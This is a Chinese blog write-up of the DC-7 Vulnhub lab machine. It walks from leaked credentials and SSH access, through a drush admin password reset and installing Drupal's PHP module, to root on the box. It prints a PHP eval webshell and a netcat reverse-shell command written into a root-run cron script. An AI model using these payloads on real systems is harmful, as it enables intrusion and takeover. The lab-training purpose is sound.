dc7靶机攻略

于 2023-10-23 22:34:44 发布
阅读量83 收藏
点赞数
分类专栏: 靶机系列 文章标签: 服务器 数据库 linux 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/134000802
版权

dc7

扫描

image-20231023211247923

image-20231023212101077

渗透

image-20231023213341684

dc7首页上去就是一个提示,跳脱常规思维

首页有个搜索框,尝试利用没成功

观察,只有首页右下角有个dc7user不知道是啥,拿去搜一下

image-20231023212425952

image-20231023212550180

在php配置文件中发现账号密码

dc7user:MdR3xOgB7#dW

尝试网页登录失败,然后试试ssh成功

image-20231023213618358

backups里发现gpg加密文件

image-20231023214101412

此处貌似无法使用gpg解密

初次之外还发现一个计划任务文件

image-20231023214548822

想利用这个,但是权限不足不能编写,只有root和www-data可以修改,直接执行没有意义

执行文件/opt/scripts/backups.sh,看一看内容

image-20231023214951541

虽然不能直接利用,但是发现它用来drush指令

drush一般用来操作drupal,刚好靶机用的这个

进入可以进行操作的目录下/var/www/html

执行代码修改admin的密码

drush user-password admin --password=123456

image-20231023215515100

成功使用admin登录后台

发现该处有上传文件的位置

image-20231023215851304

image-20231023220226905

到此处选择格式,并没有php,那也就无法执行一句话木马

上网查询找到可以安装php的方法,找到manage-extend

image-20231023220456824

输入php模块包的url安装

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

image-20231023220527911

完成后选择启用新的添加模块

image-20231023220645552

找到php的勾选上

image-20231023220711699

然后翻到最底下install

然后回去写入一句话木马

<?php @eval($_POST["cmd"]);?>

image-20231023221229093

上传成功使用蚁剑连接

image-20231023221940857

然后反弹shell到kali

image-20231023222001836

提权

刚才找到的脚本文件有修改权限的是root和www-data,而此处刚好是www-data用户

于是去编辑刚才那个脚本文件

/opt/scripts/backups.sh

该文件在任务中会被以root的身份执行,因此只需要像其中写反弹shell即可获取root的shell

echo "nc -e /bin/bash 10.4.7.138 6789" > backups.sh

image-20231023222756592

等了许久连接成功

image-20231023223152058

flag在老地方

image-20231023223221248

order libra
关注
专栏目录
DC1-DC7靶机的搭建
千寻的博客
01-08 1538
第一步 所有的镜像文件dc1-dc7 第二步 将dc-1放入文件夹下 第三步 打开VMware —右上角打开-----导入文件 第四步 配置网络 启动dc-1 靶机 第五步 扫描发现主机 Kali和靶机都放在nat模式 属于同一网段 [ip addr] [nmap -sP 192.168.139.0/24] ...
【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)
_Co1a
05-09 1001
目录 DC-7靶机渗透测试 1、信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2、登录ssh 3、 提权(suid提权) 3.1 exim4提权 4、drush 命令对任意用户密码进行更改 5、登录admin 6、拿到root权限 DC-7靶机渗透测试 0x00实验环境 kali的IP:192.168.3.188 DC-7的MAC地址:00:0C:29:FB:B4:27(192.168.3.191) (使用Kali中的arp-scan工具扫描也可) 1.
DC-7渗透笔记
现代鲁滨逊的博客
05-12 272
做得多了就感觉只是无聊的步骤的重复,毫无技术上的提升,我感觉我不想再做下去了。 1.发现主机192.168.174.158 2.照例nmap扫描,22和80端口都开着呢。 3,访问站点,drupal的cms,dc-1的站点也是由drupal搭建的。 然后中间的提示是想传递一种新概念,不要暴力破解,让我们在盒子外面思考??get不到。 4.想扫目录来着,扫了好久都没扫完,就算了。 5.进到登录界面,想看看有没有sql注入的,扔到sqlmap,啥也没跑出来☹☹ 6.没有思路,瞎捣鼓一通之后
渗透测试:DC-7靶机
Ciyaso的博客
08-23 331
一、扫描获取靶机ip arp-scan -l 192.168.203.146 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.146 开放22、80端口 2.Wappaloyzer CMS:Drupal 8 Web服务器:Apache 2.4.25 操作系统:Debian 访问网站 提示说不是一个技术问题,无法通过爆破,可以考虑"outside" the box,可以考虑信息收集(社工) 发现一个@用户 @DC7USER 搜索一下发现了一个github用户
DC-7靶机渗透测试
来日可期的博客
08-13 1153
.gpg 后缀的文件通常是使用 GNU Privacy Guard (GPG) 或类似的加密软件创建的加密文件。GPG 是一个开源的加密工具,用于确保数据的机密性和完整性。 .gpg 文件是经过加密的文件,其中包含了原始文件的内容,但使用了加密算法对其进行了保护。这些文件经过加密后,只能通过相应的私钥或密码进行解密,以还原到原始文件。
靶场练习第十五天~vulnhub靶场之dc-7
qq_57976347的博客
02-14 454
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-7.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.120 2.网站的信息收集 (1)靶机开放了80端口,先
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC-4靶机提权超详细过程
最新发布
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC user guide
01-08
Design Compile的官方用户手册,是使用DC进行电路综合必不可少的参考手册
DC-7靶机练习
IWANnaaa的博客
11-03 239
DC-7靶场练习
DC-7靶机渗透测试 (GPG,drush,mkfifo,nc提权)
single_g_l的博客
08-13 1438
找到上传路径Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,需要安装插件,将php模块(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz)导入(导入路径extend—>+Install new module),导入成功后在extend中添加模块。解锁之后,账号才成功登录。查看config文件,发现账号密码,尝试登录,发现报错,账号或密码不正确。...
DC-9靶机
m0_64334838的博客
08-16 121
浅浅的分享一下自己做的靶机记录
靶机8 DC-7(过程超详细)
honest_gg的博客
09-26 2010
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-7靶机详细渗透步骤
wwxxss
11-04 718
DC7详细的渗透的步骤,它跳出了之前的思维,提供了我们还有源码泄露漏洞,希望大家能理解步骤
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1307
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
DC-7靶机渗透测试详细教程
啊醒的博客
05-04 1134
DC-7靶机渗透测试详细教程
DC-7 (drush更改密码)
m0_66299232的博客
11-17 287
10.输入url https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz 报错了,确实无语。3.我一直在等他弹shell,没等来 想着估计时间长,看下计划任务,压根没这个任务,用cat命令看了下,立刻就弹shell了。13.把php-reverse-shell.php(github里有)的代码复制下来,换成kali地址即可。7.然后就进入到/var/www/html目录下,用drush命令修改www-data的密码。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值